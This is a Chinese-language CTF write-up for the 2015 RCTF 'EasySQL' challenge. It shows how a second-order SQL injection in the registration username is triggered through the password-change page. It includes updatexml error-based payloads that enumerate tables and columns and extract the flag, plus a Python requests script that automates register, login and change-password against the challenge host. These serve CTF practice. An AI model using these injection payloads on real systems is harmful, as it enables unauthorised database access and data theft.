C
C
CTF-WriteUp
Search
⌃K

EasySQL

进入后台之后有个修改密码功能,猜报错注入。注册页面有危险字符过滤,由于BUU的靶机顶不住fuzz,只能稍微fuzz了一下,一堆429,发现反斜杠、括号以及单双引号还是都能用。
那么可以猜出来查询语句的结构:
select * from user where username="{$username}" and pwd='{md5($password)}'
比较难搞的就是pwd的变量是有经过md5编码的,那么注入点就只能从$username搞起来了。又是二次注入,每次都需要注册再修改,很蛋疼。尝试报错注入,由于不能扫,本地拼接了再远程,很麻烦:
admin"||updatexml(1,concat(0x7e,(version()),0x7e),1);#
admin"||updatexml(1,concat(0x7e,(select(group_concat(TABLE_SCHEMA))from(information_schema.tables)),0x7e),1);#
admin"||updatexml(1,concat(0x7e,(select(group_concat(TABLE_NAME))from(information_schema.tables)WHERE(TABLE_SCHEMA=database())),0x7e),1);#
admin"||updatexml(1,concat(0x7e,(select(group_concat(COLUMN_NAME))from(information_schema.columns)WHERE(TABLE_NAME='users'))),1);#
admin"||updatexml(1,concat(0x7e,(select(real_flag_1s_here)from(users))),1);#
admin"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),1))#
admin"||(updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')))),1));#
脚本
import requests
url_reg = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/register.php'
url_log = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/login.php'
url_change = 'http://7e4dcf86-135f-4bad-98e0-1b7ad8318aad.node2.buuoj.cn.wetolink.com:82/changepwd.php'
pre = 'peri0d"'
suf = "'))),1))#"
s = 'abcdefghijklmnopqrstuvwxyz1234567890'
s = list(s)
r = requests.session()
def register(name):
data = {
'username' : name,
'password' : '123',
'email' : '123',
}
r.post(url=url_reg, data=data)
def login(name):
data = {
'username' : name,
'password' : '123',
}
r.post(url=url_log, data=data)
def changepwd():
data = {
'oldpass' : '',
'newpass' : '',
}
kk = r.post(url=url_change, data=data)
if 'target' not in kk.text:
print(kk.text)
for i in s:
paylaod = pre + "||(updatexml(1,concat((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('" + i + suf
register(paylaod)
login(paylaod)
changepwd()
2015 - Previous
2015 RCTF
Next - 2016
2016 0CTF
Last modified 8mo ago